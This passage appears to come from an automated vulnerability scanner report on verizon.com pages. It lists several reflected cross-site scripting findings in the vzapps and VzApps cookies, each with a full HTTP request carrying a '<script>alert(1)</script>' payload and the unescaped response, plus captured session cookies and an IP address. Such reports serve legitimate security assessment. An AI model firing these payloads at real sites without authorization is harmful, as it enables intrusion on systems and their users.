MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68018
Expires: Sat, 20 Nov 2010 03:14:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe9fda<script>alert(1)</script>0b8d7546ca4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXE9FDA<SCRIPT>ALERT(1)</SCRIPT>0B8D7546CA4 </DIV>
...[SNIP]...

3.199. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload d477a<script>alert(1)</script>4e4f8e6dbe8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd477a<script>alert(1)</script>4e4f8e6dbe8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68018
Expires: Sat, 20 Nov 2010 00:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd477a<script>alert(1)</script>4e4f8e6dbe8; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXD477A<SCRIPT>ALERT(1)</SCRIPT>4E4F8E6DBE8 </DIV>
...[SNIP]...

3.200. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1327c'><script>alert(1)</script>eb0b45a8082 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1327c'><script>alert(1)</script>eb0b45a8082; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68022
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1327c'><script>alert(1)</script>eb0b45a8082; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1327C'><SCRIPT>ALERT(1)</SCRIPT>EB0B45A8082 ' />
...[SNIP]...

3.201. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ed63'><script>alert(1)</script>aba8646129c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9ed63'><script>alert(1)</script>aba8646129c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68020
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9ed63'><script>alert(1)</script>aba8646129c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9ED63'><SCRIPT>ALERT(1)</SCRIPT>ABA8646129C ' />
...[SNIP]...

3.202. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 56a2d<script>alert(1)</script>eac0704937d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX56a2d<script>alert(1)</script>eac0704937d; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68015
Expires: Sat, 20 Nov 2010 03:15:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX56a2d<script>alert(1)</script>eac0704937d; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX56A2D<SCRIPT>ALERT(1)</SCRIPT>EAC0704937D </DIV>
...[SNIP]...

3.203. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 98e16<script>alert(1)</script>9d0879de158 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX98e16<script>alert(1)</script>9d0879de158; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68015
Expires: Sat, 20 Nov 2010 00:09:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX98e16<script>alert(1)</script>9d0879de158; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX98E16<SCRIPT>ALERT(1)</SCRIPT>9D0879DE158 </DIV>
...[SNIP]...

3.204. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0257'><script>alert(1)</script>be1613d7d65 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc0257'><script>alert(1)</script>be1613d7d65; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68019
Expires: Sat, 20 Nov 2010 00:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc0257'><script>alert(1)</script>be1613d7d65; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC0257'><SCRIPT>ALERT(1)</SCRIPT>BE1613D7D65 ' />
...[SNIP]...

3.205. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 640aa<script>alert(1)</script>383bb65ea2f was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX640aa<script>alert(1)</script>383bb65ea2f; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 
